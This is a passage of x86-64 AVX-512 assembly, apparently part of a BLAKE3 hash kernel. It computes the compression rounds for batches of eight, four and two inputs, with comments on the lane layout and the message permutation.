vpaddd ymm10, ymm10, ymm15
vpaddd ymm11, ymm11, ymm12
vpaddd ymm8, ymm8, ymm13
vpaddd ymm9, ymm9, ymm14
vpxord ymm5, ymm5, ymm10
vpxord ymm6, ymm6, ymm11
vpxord ymm7, ymm7, ymm8
vpxord ymm4, ymm4, ymm9
vprord ymm5, ymm5, 7
vprord ymm6, ymm6, 7
vprord ymm7, ymm7, 7
vprord ymm4, ymm4, 7
vpaddd ymm0, ymm0, ymm26
vpaddd ymm1, ymm1, ymm28
vpaddd ymm2, ymm2, ymm30
vpaddd ymm3, ymm3, ymm29
vpaddd ymm0, ymm0, ymm4
vpaddd ymm1, ymm1, ymm5
vpaddd ymm2, ymm2, ymm6
vpaddd ymm3, ymm3, ymm7
vpxord ymm12, ymm12, ymm0
vpxord ymm13, ymm13, ymm1
vpxord ymm14, ymm14, ymm2
vpxord ymm15, ymm15, ymm3
vprord ymm12, ymm12, 16
vprord ymm13, ymm13, 16
vprord ymm14, ymm14, 16
vprord ymm15, ymm15, 16
vpaddd ymm8, ymm8, ymm12
vpaddd ymm9, ymm9, ymm13
vpaddd ymm10, ymm10, ymm14
vpaddd ymm11, ymm11, ymm15
vpxord ymm4, ymm4, ymm8
vpxord ymm5, ymm5, ymm9
vpxord ymm6, ymm6, ymm10
vpxord ymm7, ymm7, ymm11
vprord ymm4, ymm4, 12
vprord ymm5, ymm5, 12
vprord ymm6, ymm6, 12
vprord ymm7, ymm7, 12
vpaddd ymm0, ymm0, ymm23
vpaddd ymm1, ymm1, ymm25
vpaddd ymm2, ymm2, ymm19
vpaddd ymm3, ymm3, ymm31
vpaddd ymm0, ymm0, ymm4
vpaddd ymm1, ymm1, ymm5
vpaddd ymm2, ymm2, ymm6
vpaddd ymm3, ymm3, ymm7
vpxord ymm12, ymm12, ymm0
vpxord ymm13, ymm13, ymm1
vpxord ymm14, ymm14, ymm2
vpxord ymm15, ymm15, ymm3
vprord ymm12, ymm12, 8
vprord ymm13, ymm13, 8
vprord ymm14, ymm14, 8
vprord ymm15, ymm15, 8
vpaddd ymm8, ymm8, ymm12
vpaddd ymm9, ymm9, ymm13
vpaddd ymm10, ymm10, ymm14
vpaddd ymm11, ymm11, ymm15
vpxord ymm4, ymm4, ymm8
vpxord ymm5, ymm5, ymm9
vpxord ymm6, ymm6, ymm10
vpxord ymm7, ymm7, ymm11
vprord ymm4, ymm4, 7
vprord ymm5, ymm5, 7
vprord ymm6, ymm6, 7
vprord ymm7, ymm7, 7
vpaddd ymm0, ymm0, ymm20
vpaddd ymm1, ymm1, ymm27
vpaddd ymm2, ymm2, ymm21
vpaddd ymm3, ymm3, ymm17
vpaddd ymm0, ymm0, ymm5
vpaddd ymm1, ymm1, ymm6
vpaddd ymm2, ymm2, ymm7
vpaddd ymm3, ymm3, ymm4
vpxord ymm15, ymm15, ymm0
vpxord ymm12, ymm12, ymm1
vpxord ymm13, ymm13, ymm2
vpxord ymm14, ymm14, ymm3
vprord ymm15, ymm15, 16
vprord ymm12, ymm12, 16
vprord ymm13, ymm13, 16
vprord ymm14, ymm14, 16
vpaddd ymm10, ymm10, ymm15
vpaddd ymm11, ymm11, ymm12
vpaddd ymm8, ymm8, ymm13
vpaddd ymm9, ymm9, ymm14
vpxord ymm5, ymm5, ymm10
vpxord ymm6, ymm6, ymm11
vpxord ymm7, ymm7, ymm8
vpxord ymm4, ymm4, ymm9
vprord ymm5, ymm5, 12
vprord ymm6, ymm6, 12
vprord ymm7, ymm7, 12
vprord ymm4, ymm4, 12
vpaddd ymm0, ymm0, ymm16
vpaddd ymm1, ymm1, ymm18
vpaddd ymm2, ymm2, ymm24
vpaddd ymm3, ymm3, ymm22
vpaddd ymm0, ymm0, ymm5
vpaddd ymm1, ymm1, ymm6
vpaddd ymm2, ymm2, ymm7
vpaddd ymm3, ymm3, ymm4
vpxord ymm15, ymm15, ymm0
vpxord ymm12, ymm12, ymm1
vpxord ymm13, ymm13, ymm2
vpxord ymm14, ymm14, ymm3
vprord ymm15, ymm15, 8
vprord ymm12, ymm12, 8
vprord ymm13, ymm13, 8
vprord ymm14, ymm14, 8
vpaddd ymm10, ymm10, ymm15
vpaddd ymm11, ymm11, ymm12
vpaddd ymm8, ymm8, ymm13
vpaddd ymm9, ymm9, ymm14
vpxord ymm5, ymm5, ymm10
vpxord ymm6, ymm6, ymm11
vpxord ymm7, ymm7, ymm8
vpxord ymm4, ymm4, ymm9
vprord ymm5, ymm5, 7
vprord ymm6, ymm6, 7
vprord ymm7, ymm7, 7
vprord ymm4, ymm4, 7
vpaddd ymm0, ymm0, ymm28
vpaddd ymm1, ymm1, ymm25
vpaddd ymm2, ymm2, ymm31
vpaddd ymm3, ymm3, ymm30
vpaddd ymm0, ymm0, ymm4
vpaddd ymm1, ymm1, ymm5
vpaddd ymm2, ymm2, ymm6
vpaddd ymm3, ymm3, ymm7
vpxord ymm12, ymm12, ymm0
vpxord ymm13, ymm13, ymm1
vpxord ymm14, ymm14, ymm2
vpxord ymm15, ymm15, ymm3
vprord ymm12, ymm12, 16
vprord ymm13, ymm13, 16
vprord ymm14, ymm14, 16
vprord ymm15, ymm15, 16
vpaddd ymm8, ymm8, ymm12
vpaddd ymm9, ymm9, ymm13
vpaddd ymm10, ymm10, ymm14
vpaddd ymm11, ymm11, ymm15
vpxord ymm4, ymm4, ymm8
vpxord ymm5, ymm5, ymm9
vpxord ymm6, ymm6, ymm10
vpxord ymm7, ymm7, ymm11
vprord ymm4, ymm4, 12
vprord ymm5, ymm5, 12
vprord ymm6, ymm6, 12
vprord ymm7, ymm7, 12
vpaddd ymm0, ymm0, ymm29
vpaddd ymm1, ymm1, ymm27
vpaddd ymm2, ymm2, ymm26
vpaddd ymm3, ymm3, ymm24
vpaddd ymm0, ymm0, ymm4
vpaddd ymm1, ymm1, ymm5
vpaddd ymm2, ymm2, ymm6
vpaddd ymm3, ymm3, ymm7
vpxord ymm12, ymm12, ymm0
vpxord ymm13, ymm13, ymm1
vpxord ymm14, ymm14, ymm2
vpxord ymm15, ymm15, ymm3
vprord ymm12, ymm12, 8
vprord ymm13, ymm13, 8
vprord ymm14, ymm14, 8
vprord ymm15, ymm15, 8
vpaddd ymm8, ymm8, ymm12
vpaddd ymm9, ymm9, ymm13
vpaddd ymm10, ymm10, ymm14
vpaddd ymm11, ymm11, ymm15
vpxord ymm4, ymm4, ymm8
vpxord ymm5, ymm5, ymm9
vpxord ymm6, ymm6, ymm10
vpxord ymm7, ymm7, ymm11
vprord ymm4, ymm4, 7
vprord ymm5, ymm5, 7
vprord ymm6, ymm6, 7
vprord ymm7, ymm7, 7
vpaddd ymm0, ymm0, ymm23
vpaddd ymm1, ymm1, ymm21
vpaddd ymm2, ymm2, ymm16
vpaddd ymm3, ymm3, ymm22
vpaddd ymm0, ymm0, ymm5
vpaddd ymm1, ymm1, ymm6
vpaddd ymm2, ymm2, ymm7
vpaddd ymm3, ymm3, ymm4
vpxord ymm15, ymm15, ymm0
vpxord ymm12, ymm12, ymm1
vpxord ymm13, ymm13, ymm2
vpxord ymm14, ymm14, ymm3
vprord ymm15, ymm15, 16
vprord ymm12, ymm12, 16
vprord ymm13, ymm13, 16
vprord ymm14, ymm14, 16
vpaddd ymm10, ymm10, ymm15
vpaddd ymm11, ymm11, ymm12
vpaddd ymm8, ymm8, ymm13
vpaddd ymm9, ymm9, ymm14
vpxord ymm5, ymm5, ymm10
vpxord ymm6, ymm6, ymm11
vpxord ymm7, ymm7, ymm8
vpxord ymm4, ymm4, ymm9
vprord ymm5, ymm5, 12
vprord ymm6, ymm6, 12
vprord ymm7, ymm7, 12
vprord ymm4, ymm4, 12
vpaddd ymm0, ymm0, ymm18
vpaddd ymm1, ymm1, ymm19
vpaddd ymm2, ymm2, ymm17
vpaddd ymm3, ymm3, ymm20
vpaddd ymm0, ymm0, ymm5
vpaddd ymm1, ymm1, ymm6
vpaddd ymm2, ymm2, ymm7
vpaddd ymm3, ymm3, ymm4
vpxord ymm15, ymm15, ymm0
vpxord ymm12, ymm12, ymm1
vpxord ymm13, ymm13, ymm2
vpxord ymm14, ymm14, ymm3
vprord ymm15, ymm15, 8
vprord ymm12, ymm12, 8
vprord ymm13, ymm13, 8
vprord ymm14, ymm14, 8
vpaddd ymm10, ymm10, ymm15
vpaddd ymm11, ymm11, ymm12
vpaddd ymm8, ymm8, ymm13
vpaddd ymm9, ymm9, ymm14
vpxord ymm5, ymm5, ymm10
vpxord ymm6, ymm6, ymm11
vpxord ymm7, ymm7, ymm8
vpxord ymm4, ymm4, ymm9
vprord ymm5, ymm5, 7
vprord ymm6, ymm6, 7
vprord ymm7, ymm7, 7
vprord ymm4, ymm4, 7
vpaddd ymm0, ymm0, ymm25
vpaddd ymm1, ymm1, ymm27
vpaddd ymm2, ymm2, ymm24
vpaddd ymm3, ymm3, ymm31
vpaddd ymm0, ymm0, ymm4
vpaddd ymm1, ymm1, ymm5
vpaddd ymm2, ymm2, ymm6
vpaddd ymm3, ymm3, ymm7
vpxord ymm12, ymm12, ymm0
vpxord ymm13, ymm13, ymm1
vpxord ymm14, ymm14, ymm2
vpxord ymm15, ymm15, ymm3
vprord ymm12, ymm12, 16
vprord ymm13, ymm13, 16
vprord ymm14, ymm14, 16
vprord ymm15, ymm15, 16
vpaddd ymm8, ymm8, ymm12
vpaddd ymm9, ymm9, ymm13
vpaddd ymm10, ymm10, ymm14
vpaddd ymm11, ymm11, ymm15
vpxord ymm4, ymm4, ymm8
vpxord ymm5, ymm5, ymm9
vpxord ymm6, ymm6, ymm10
vpxord ymm7, ymm7, ymm11
vprord ymm4, ymm4, 12
vprord ymm5, ymm5, 12
vprord ymm6, ymm6, 12
vprord ymm7, ymm7, 12
vpaddd ymm0, ymm0, ymm30
vpaddd ymm1, ymm1, ymm21
vpaddd ymm2, ymm2, ymm28
vpaddd ymm3, ymm3, ymm17
vpaddd ymm0, ymm0, ymm4
vpaddd ymm1, ymm1, ymm5
vpaddd ymm2, ymm2, ymm6
vpaddd ymm3, ymm3, ymm7
vpxord ymm12, ymm12, ymm0
vpxord ymm13, ymm13, ymm1
vpxord ymm14, ymm14, ymm2
vpxord ymm15, ymm15, ymm3
vprord ymm12, ymm12, 8
vprord ymm13, ymm13, 8
vprord ymm14, ymm14, 8
vprord ymm15, ymm15, 8
vpaddd ymm8, ymm8, ymm12
vpaddd ymm9, ymm9, ymm13
vpaddd ymm10, ymm10, ymm14
vpaddd ymm11, ymm11, ymm15
vpxord ymm4, ymm4, ymm8
vpxord ymm5, ymm5, ymm9
vpxord ymm6, ymm6, ymm10
vpxord ymm7, ymm7, ymm11
vprord ymm4, ymm4, 7
vprord ymm5, ymm5, 7
vprord ymm6, ymm6, 7
vprord ymm7, ymm7, 7
vpaddd ymm0, ymm0, ymm29
vpaddd ymm1, ymm1, ymm16
vpaddd ymm2, ymm2, ymm18
vpaddd ymm3, ymm3, ymm20
vpaddd ymm0, ymm0, ymm5
vpaddd ymm1, ymm1, ymm6
vpaddd ymm2, ymm2, ymm7
vpaddd ymm3, ymm3, ymm4
vpxord ymm15, ymm15, ymm0
vpxord ymm12, ymm12, ymm1
vpxord ymm13, ymm13, ymm2
vpxord ymm14, ymm14, ymm3
vprord ymm15, ymm15, 16
vprord ymm12, ymm12, 16
vprord ymm13, ymm13, 16
vprord ymm14, ymm14, 16
vpaddd ymm10, ymm10, ymm15
vpaddd ymm11, ymm11, ymm12
vpaddd ymm8, ymm8, ymm13
vpaddd ymm9, ymm9, ymm14
vpxord ymm5, ymm5, ymm10
vpxord ymm6, ymm6, ymm11
vpxord ymm7, ymm7, ymm8
vpxord ymm4, ymm4, ymm9
vprord ymm5, ymm5, 12
vprord ymm6, ymm6, 12
vprord ymm7, ymm7, 12
vprord ymm4, ymm4, 12
vpaddd ymm0, ymm0, ymm19
vpaddd ymm1, ymm1, ymm26
vpaddd ymm2, ymm2, ymm22
vpaddd ymm3, ymm3, ymm23
vpaddd ymm0, ymm0, ymm5
vpaddd ymm1, ymm1, ymm6
vpaddd ymm2, ymm2, ymm7
vpaddd ymm3, ymm3, ymm4
vpxord ymm15, ymm15, ymm0
vpxord ymm12, ymm12, ymm1
vpxord ymm13, ymm13, ymm2
vpxord ymm14, ymm14, ymm3
vprord ymm15, ymm15, 8
vprord ymm12, ymm12, 8
vprord ymm13, ymm13, 8
vprord ymm14, ymm14, 8
vpaddd ymm10, ymm10, ymm15
vpaddd ymm11, ymm11, ymm12
vpaddd ymm8, ymm8, ymm13
vpaddd ymm9, ymm9, ymm14
vpxord ymm5, ymm5, ymm10
vpxord ymm6, ymm6, ymm11
vpxord ymm7, ymm7, ymm8
vpxord ymm4, ymm4, ymm9
vprord ymm5, ymm5, 7
vprord ymm6, ymm6, 7
vprord ymm7, ymm7, 7
vprord ymm4, ymm4, 7
vpaddd ymm0, ymm0, ymm27
vpaddd ymm1, ymm1, ymm21
vpaddd ymm2, ymm2, ymm17
vpaddd ymm3, ymm3, ymm24
vpaddd ymm0, ymm0, ymm4
vpaddd ymm1, ymm1, ymm5
vpaddd ymm2, ymm2, ymm6
vpaddd ymm3, ymm3, ymm7
vpxord ymm12, ymm12, ymm0
vpxord ymm13, ymm13, ymm1
vpxord ymm14, ymm14, ymm2
vpxord ymm15, ymm15, ymm3
vprord ymm12, ymm12, 16
vprord ymm13, ymm13, 16
vprord ymm14, ymm14, 16
vprord ymm15, ymm15, 16
vpaddd ymm8, ymm8, ymm12
vpaddd ymm9, ymm9, ymm13
vpaddd ymm10, ymm10, ymm14
vpaddd ymm11, ymm11, ymm15
vpxord ymm4, ymm4, ymm8
vpxord ymm5, ymm5, ymm9
vpxord ymm6, ymm6, ymm10
vpxord ymm7, ymm7, ymm11
vprord ymm4, ymm4, 12
vprord ymm5, ymm5, 12
vprord ymm6, ymm6, 12
vprord ymm7, ymm7, 12
vpaddd ymm0, ymm0, ymm31
vpaddd ymm1, ymm1, ymm16
vpaddd ymm2, ymm2, ymm25
vpaddd ymm3, ymm3, ymm22
vpaddd ymm0, ymm0, ymm4
vpaddd ymm1, ymm1, ymm5
vpaddd ymm2, ymm2, ymm6
vpaddd ymm3, ymm3, ymm7
vpxord ymm12, ymm12, ymm0
vpxord ymm13, ymm13, ymm1
vpxord ymm14, ymm14, ymm2
vpxord ymm15, ymm15, ymm3
vprord ymm12, ymm12, 8
vprord ymm13, ymm13, 8
vprord ymm14, ymm14, 8
vprord ymm15, ymm15, 8
vpaddd ymm8, ymm8, ymm12
vpaddd ymm9, ymm9, ymm13
vpaddd ymm10, ymm10, ymm14
vpaddd ymm11, ymm11, ymm15
vpxord ymm4, ymm4, ymm8
vpxord ymm5, ymm5, ymm9
vpxord ymm6, ymm6, ymm10
vpxord ymm7, ymm7, ymm11
vprord ymm4, ymm4, 7
vprord ymm5, ymm5, 7
vprord ymm6, ymm6, 7
vprord ymm7, ymm7, 7
vpaddd ymm0, ymm0, ymm30
vpaddd ymm1, ymm1, ymm18
vpaddd ymm2, ymm2, ymm19
vpaddd ymm3, ymm3, ymm23
vpaddd ymm0, ymm0, ymm5
vpaddd ymm1, ymm1, ymm6
vpaddd ymm2, ymm2, ymm7
vpaddd ymm3, ymm3, ymm4
vpxord ymm15, ymm15, ymm0
vpxord ymm12, ymm12, ymm1
vpxord ymm13, ymm13, ymm2
vpxord ymm14, ymm14, ymm3
vprord ymm15, ymm15, 16
vprord ymm12, ymm12, 16
vprord ymm13, ymm13, 16
vprord ymm14, ymm14, 16
vpaddd ymm10, ymm10, ymm15
vpaddd ymm11, ymm11, ymm12
vpaddd ymm8, ymm8, ymm13
vpaddd ymm9, ymm9, ymm14
vpxord ymm5, ymm5, ymm10
vpxord ymm6, ymm6, ymm11
vpxord ymm7, ymm7, ymm8
vpxord ymm4, ymm4, ymm9
vprord ymm5, ymm5, 12
vprord ymm6, ymm6, 12
vprord ymm7, ymm7, 12
vprord ymm4, ymm4, 12
vpaddd ymm0, ymm0, ymm26
vpaddd ymm1, ymm1, ymm28
vpaddd ymm2, ymm2, ymm20
vpaddd ymm3, ymm3, ymm29
vpaddd ymm0, ymm0, ymm5
vpaddd ymm1, ymm1, ymm6
vpaddd ymm2, ymm2, ymm7
vpaddd ymm3, ymm3, ymm4
vpxord ymm15, ymm15, ymm0
vpxord ymm12, ymm12, ymm1
vpxord ymm13, ymm13, ymm2
vpxord ymm14, ymm14, ymm3
vprord ymm15, ymm15, 8
vprord ymm12, ymm12, 8
vprord ymm13, ymm13, 8
vprord ymm14, ymm14, 8
vpaddd ymm10, ymm10, ymm15
vpaddd ymm11, ymm11, ymm12
vpaddd ymm8, ymm8, ymm13
vpaddd ymm9, ymm9, ymm14
vpxord ymm5, ymm5, ymm10
vpxord ymm6, ymm6, ymm11
vpxord ymm7, ymm7, ymm8
vpxord ymm4, ymm4, ymm9
vprord ymm5, ymm5, 7
vprord ymm6, ymm6, 7
vprord ymm7, ymm7, 7
vprord ymm4, ymm4, 7
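// Feed-forward: XOR the two state halves; ymm0-7 now hold the eight
// 32-bit chaining-value words for each of the eight lanes.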
vpxor ymm0, ymm0, ymm8
vpxor ymm1, ymm1, ymm9
vpxor ymm2, ymm2, ymm10
vpxor ymm3, ymm3, ymm11
vpxor ymm4, ymm4, ymm12
vpxor ymm5, ymm5, ymm13
vpxor ymm6, ymm6, ymm14
vpxor ymm7, ymm7, ymm15
movzx eax, byte ptr [rbp+0x38]
jne 2b
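// Batch done: reload the output pointer, transpose the eight CVs from
// lane-major registers back to row order, and store 32 bytes per input.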
mov rbx, qword ptr [rbp+0x50]
vunpcklps ymm8, ymm0, ymm1
vunpcklps ymm9, ymm2, ymm3
vunpckhps ymm10, ymm0, ymm1
vunpcklps ymm11, ymm4, ymm5
vunpcklps ymm0, ymm6, ymm7
vshufps ymm12, ymm8, ymm9, 78
vblendps ymm1, ymm8, ymm12, 0xCC
vshufps ymm8, ymm11, ymm0, 78
vunpckhps ymm13, ymm2, ymm3
vblendps ymm2, ymm11, ymm8, 0xCC
vblendps ymm3, ymm12, ymm9, 0xCC
vperm2f128 ymm12, ymm1, ymm2, 0x20
vmovups ymmword ptr [rbx], ymm12
vunpckhps ymm14, ymm4, ymm5
vblendps ymm4, ymm8, ymm0, 0xCC
vunpckhps ymm15, ymm6, ymm7
vperm2f128 ymm7, ymm3, ymm4, 0x20
vmovups ymmword ptr [rbx+0x20], ymm7
vshufps ymm5, ymm10, ymm13, 78
vblendps ymm6, ymm5, ymm13, 0xCC
vshufps ymm13, ymm14, ymm15, 78
vblendps ymm10, ymm10, ymm5, 0xCC
vblendps ymm14, ymm14, ymm13, 0xCC
vperm2f128 ymm8, ymm10, ymm14, 0x20
vmovups ymmword ptr [rbx+0x40], ymm8
vblendps ymm15, ymm13, ymm15, 0xCC
vperm2f128 ymm13, ymm6, ymm15, 0x20
vmovups ymmword ptr [rbx+0x60], ymm13
vperm2f128 ymm9, ymm1, ymm2, 0x31
vperm2f128 ymm11, ymm3, ymm4, 0x31
vmovups ymmword ptr [rbx+0x80], ymm9
vperm2f128 ymm14, ymm10, ymm14, 0x31
vperm2f128 ymm15, ymm6, ymm15, 0x31
vmovups ymmword ptr [rbx+0xA0], ymm11
vmovups ymmword ptr [rbx+0xC0], ymm14
vmovups ymmword ptr [rbx+0xE0], ymm15
vmovdqa ymm0, ymmword ptr [rsp]
vmovdqa ymm2, ymmword ptr [rsp+0x2*0x20]
vmovdqa32 ymm0 {k1}, ymmword ptr [rsp+0x1*0x20]
vmovdqa32 ymm2 {k1}, ymmword ptr [rsp+0x3*0x20]
vmovdqa ymmword ptr [rsp], ymm0
vmovdqa ymmword ptr [rsp+0x2*0x20], ymm2
add rbx, 256
mov qword ptr [rbp+0x50], rbx
add rdi, 64
sub rsi, 8
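// Fewer than eight inputs remain: reload the output pointer and the
// per-call flag/length state, then fall into the 4-, 2-, and 1-input
// tail paths.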
3:
mov rbx, qword ptr [rbp+0x50]
mov r15, qword ptr [rsp+0x80]
movzx r13, byte ptr [rbp+0x38]
movzx r12, byte ptr [rbp+0x48]
test esi, 0x4
je 3f
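// Four inputs: each zmm row holds four 128-bit lanes, one input per lane;
// message words are gathered with vinserti32x4 from the four pointers.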
vbroadcasti32x4 zmm0, xmmword ptr [rcx]
vbroadcasti32x4 zmm1, xmmword ptr [rcx+0x1*0x10]
vmovdqa xmm12, xmmword ptr [rsp]
vmovdqa xmm13, xmmword ptr [rsp+0x4*0x10]
vpunpckldq xmm14, xmm12, xmm13
vpunpckhdq xmm15, xmm12, xmm13
vpermq ymm14, ymm14, 0xDC
vpermq ymm15, ymm15, 0xDC
vpbroadcastd zmm12, dword ptr [BLAKE3_BLOCK_LEN+rip]
vinserti64x4 zmm13, zmm14, ymm15, 0x01
mov eax, 17476
kmovw k2, eax
vpblendmd zmm13 {k2}, zmm13, zmm12
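// zmm13 = per-lane [counter_lo, counter_hi, BLAKE3_BLOCK_LEN, -]; the
// per-block flags word is blended into the fourth slot each iteration.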
vbroadcasti32x4 zmm15, xmmword ptr [BLAKE3_IV+rip]
mov r8, qword ptr [rdi]
mov r9, qword ptr [rdi+0x8]
mov r10, qword ptr [rdi+0x10]
mov r11, qword ptr [rdi+0x18]
mov eax, 43690
kmovw k3, eax
mov eax, 34952
kmovw k4, eax
movzx eax, byte ptr [rbp+0x40]
or eax, r13d
xor edx, edx
.p2align 5
2:
mov r14d, eax
or eax, r12d
add rdx, 64
cmp rdx, r15
cmovne eax, r14d
mov dword ptr [rsp+0x88], eax
vmovdqa32 zmm2, zmm15
vpbroadcastd zmm8, dword ptr [rsp+0x22*0x4]
vpblendmd zmm3 {k4}, zmm13, zmm8
vmovups zmm8, zmmword ptr [r8+rdx-0x1*0x40]
vinserti32x4 zmm8, zmm8, xmmword ptr [r9+rdx-0x4*0x10], 0x01
vinserti32x4 zmm8, zmm8, xmmword ptr [r10+rdx-0x4*0x10], 0x02
vinserti32x4 zmm8, zmm8, xmmword ptr [r11+rdx-0x4*0x10], 0x03
vmovups zmm9, zmmword ptr [r8+rdx-0x30]
vinserti32x4 zmm9, zmm9, xmmword ptr [r9+rdx-0x3*0x10], 0x01
vinserti32x4 zmm9, zmm9, xmmword ptr [r10+rdx-0x3*0x10], 0x02
vinserti32x4 zmm9, zmm9, xmmword ptr [r11+rdx-0x3*0x10], 0x03
vshufps zmm4, zmm8, zmm9, 136
vshufps zmm5, zmm8, zmm9, 221
vmovups zmm8, zmmword ptr [r8+rdx-0x20]
vinserti32x4 zmm8, zmm8, xmmword ptr [r9+rdx-0x2*0x10], 0x01
vinserti32x4 zmm8, zmm8, xmmword ptr [r10+rdx-0x2*0x10], 0x02
vinserti32x4 zmm8, zmm8, xmmword ptr [r11+rdx-0x2*0x10], 0x03
vmovups zmm9, zmmword ptr [r8+rdx-0x10]
vinserti32x4 zmm9, zmm9, xmmword ptr [r9+rdx-0x1*0x10], 0x01
vinserti32x4 zmm9, zmm9, xmmword ptr [r10+rdx-0x1*0x10], 0x02
vinserti32x4 zmm9, zmm9, xmmword ptr [r11+rdx-0x1*0x10], 0x03
vshufps zmm6, zmm8, zmm9, 136
vshufps zmm7, zmm8, zmm9, 221
vpshufd zmm6, zmm6, 0x93
vpshufd zmm7, zmm7, 0x93
mov al, 7
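// Seven BLAKE3 rounds; al counts down, with the message permutation
// applied between rounds.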
9:
vpaddd zmm0, zmm0, zmm4
vpaddd zmm0, zmm0, zmm1
vpxord zmm3, zmm3, zmm0
vprord zmm3, zmm3, 16
vpaddd zmm2, zmm2, zmm3
vpxord zmm1, zmm1, zmm2
vprord zmm1, zmm1, 12
vpaddd zmm0, zmm0, zmm5
vpaddd zmm0, zmm0, zmm1
vpxord zmm3, zmm3, zmm0
vprord zmm3, zmm3, 8
vpaddd zmm2, zmm2, zmm3
vpxord zmm1, zmm1, zmm2
vprord zmm1, zmm1, 7
vpshufd zmm0, zmm0, 0x93
vpshufd zmm3, zmm3, 0x4E
vpshufd zmm2, zmm2, 0x39
vpaddd zmm0, zmm0, zmm6
vpaddd zmm0, zmm0, zmm1
vpxord zmm3, zmm3, zmm0
vprord zmm3, zmm3, 16
vpaddd zmm2, zmm2, zmm3
vpxord zmm1, zmm1, zmm2
vprord zmm1, zmm1, 12
vpaddd zmm0, zmm0, zmm7
vpaddd zmm0, zmm0, zmm1
vpxord zmm3, zmm3, zmm0
vprord zmm3, zmm3, 8
vpaddd zmm2, zmm2, zmm3
vpxord zmm1, zmm1, zmm2
vprord zmm1, zmm1, 7
vpshufd zmm0, zmm0, 0x39
vpshufd zmm3, zmm3, 0x4E
vpshufd zmm2, zmm2, 0x93
dec al
jz 9f
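// Apply the BLAKE3 message permutation (2,6,3,10,7,0,4,13,1,11,12,5,
// 9,14,15,8) in-register with shuffles and blends instead of reloading.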
vshufps zmm8, zmm4, zmm5, 214
vpshufd zmm9, zmm4, 0x0F
vpshufd zmm4, zmm8, 0x39
vshufps zmm8, zmm6, zmm7, 250
vpblendmd zmm9 {k3}, zmm9, zmm8
vpunpcklqdq zmm8, zmm7, zmm5
vpblendmd zmm8 {k4}, zmm8, zmm6
vpshufd zmm8, zmm8, 0x78
vpunpckhdq zmm5, zmm5, zmm7
vpunpckldq zmm6, zmm6, zmm5
vpshufd zmm7, zmm6, 0x1E
vmovdqa32 zmm5, zmm9
vmovdqa32 zmm6, zmm8
jmp 9b
9:
vpxord zmm0, zmm0, zmm2
vpxord zmm1, zmm1, zmm3
mov eax, r13d
cmp rdx, r15
jne 2b
vmovdqu xmmword ptr [rbx], xmm0
vmovdqu xmmword ptr [rbx+0x10], xmm1
vextracti128 xmmword ptr [rbx+0x20], ymm0, 0x01
vextracti128 xmmword ptr [rbx+0x30], ymm1, 0x01
vextracti32x4 xmmword ptr [rbx+0x4*0x10], zmm0, 0x02
vextracti32x4 xmmword ptr [rbx+0x5*0x10], zmm1, 0x02
vextracti32x4 xmmword ptr [rbx+0x6*0x10], zmm0, 0x03
vextracti32x4 xmmword ptr [rbx+0x7*0x10], zmm1, 0x03
vmovdqa xmm0, xmmword ptr [rsp]
vmovdqa xmm2, xmmword ptr [rsp+0x40]
vmovdqa32 xmm0 {k1}, xmmword ptr [rsp+0x1*0x10]
vmovdqa32 xmm2 {k1}, xmmword ptr [rsp+0x5*0x10]
vmovdqa xmmword ptr [rsp], xmm0
vmovdqa xmmword ptr [rsp+0x40], xmm2
add rbx, 128
add rdi, 32
sub rsi, 4
3:
test esi, 0x2
je 3f
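// Two inputs: one input per 128-bit half of each ymm register.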
vbroadcasti128 ymm0, xmmword ptr [rcx]
vbroadcasti128 ymm1, xmmword ptr [rcx+0x10]
vmovd xmm13, dword ptr [rsp]
vpinsrd xmm13, xmm13, dword ptr [rsp+0x40], 1
vpinsrd xmm13, xmm13, dword ptr [BLAKE3_BLOCK_LEN+rip], 2
vmovd xmm14, dword ptr [rsp+0x4]
vpinsrd xmm14, xmm14, dword ptr [rsp+0x44], 1
vpinsrd xmm14, xmm14, dword ptr [BLAKE3_BLOCK_LEN+rip], 2
vinserti128 ymm13, ymm13, xmm14, 0x01
mov r8, qword ptr [rdi]
mov r9, qword ptr [rdi+0x8]
movzx eax, byte ptr [rbp+0x40]
or eax, r13d
xor edx, edx
.p2align 5
2:
mov r14d, eax
or eax, r12d
add rdx, 64
cmp rdx, r15
cmovne eax, r14d
mov dword ptr [rsp+0x88], eax
vbroadcasti128 ymm2, xmmword ptr [BLAKE3_IV+rip]
vpbroadcastd ymm8, dword ptr [rsp+0x88]
vpblendd ymm3, ymm13, ymm8, 0x88
vmovups ymm8, ymmword ptr [r8+rdx-0x40]
vinsertf128 ymm8, ymm8, xmmword ptr [r9+rdx-0x40], 0x01
vmovups ymm9, ymmword ptr [r8+rdx-0x30]
vinsertf128 ymm9, ymm9, xmmword ptr [r9+rdx-0x30], 0x01
vshufps ymm4, ymm8, ymm9, 136
vshufps ymm5, ymm8, ymm9, 221
vmovups ymm8, ymmword ptr [r8+rdx-0x20]
vinsertf128 ymm8, ymm8, xmmword ptr [r9+rdx-0x20], 0x01
vmovups ymm9, ymmword ptr [r8+rdx-0x10]
vinsertf128 ymm9, ymm9, xmmword ptr [r9+rdx-0x10], 0x01
vshufps ymm6, ymm8, ymm9, 136
vshufps ymm7, ymm8, ymm9, 221
vpshufd ymm6, ymm6, 0x93
vpshufd ymm7, ymm7, 0x93
mov al, 7
9:
vpaddd ymm0, ymm0, ymm4
vpaddd ymm0, ymm0, ymm1
vpxord ymm3, ymm3, ymm0
vprord ymm3, ymm3, 16
vpaddd ymm2, ymm2, ymm3
vpxord ymm1, ymm1, ymm2
vprord ymm1, ymm1, 12
vpaddd ymm0, ymm0, ymm5
vpaddd ymm0, ymm0, ymm1
vpxord ymm3, ymm3, ymm0
vprord ymm3, ymm3, 8
vpaddd ymm2, ymm2, ymm3
vpxord ymm1, ymm1, ymm2
vprord ymm1, ymm1, 7
vpshufd ymm0, ymm0, 0x93
vpshufd ymm3, ymm3, 0x4E
vpshufd ymm2, ymm2, 0x39
vpaddd ymm0, ymm0, ymm6
vpaddd ymm0, ymm0, ymm1
vpxord ymm3, ymm3, ymm0
vprord ymm3, ymm3, 16
vpaddd ymm2, ymm2, ymm3
vpxord ymm1, ymm1, ymm2
vprord ymm1, ymm1, 12
vpaddd ymm0, ymm0, ymm7
vpaddd ymm0, ymm0, ymm1
vpxord ymm3, ymm3, ymm0
vprord ymm3, ymm3, 8
vpaddd ymm2, ymm2, ymm3
vpxord ymm1, ymm1, ymm2
vprord ymm1, ymm1, 7
vpshufd ymm0, ymm0, 0x39
vpshufd ymm3, ymm3, 0x4E
vpshufd ymm2, ymm2, 0x93
dec al
jz 9f
vshufps ymm8, ymm4, ymm5, 214
vpshufd ymm9, ymm4, 0x0F
vpshufd ymm4, ymm8, 0x39
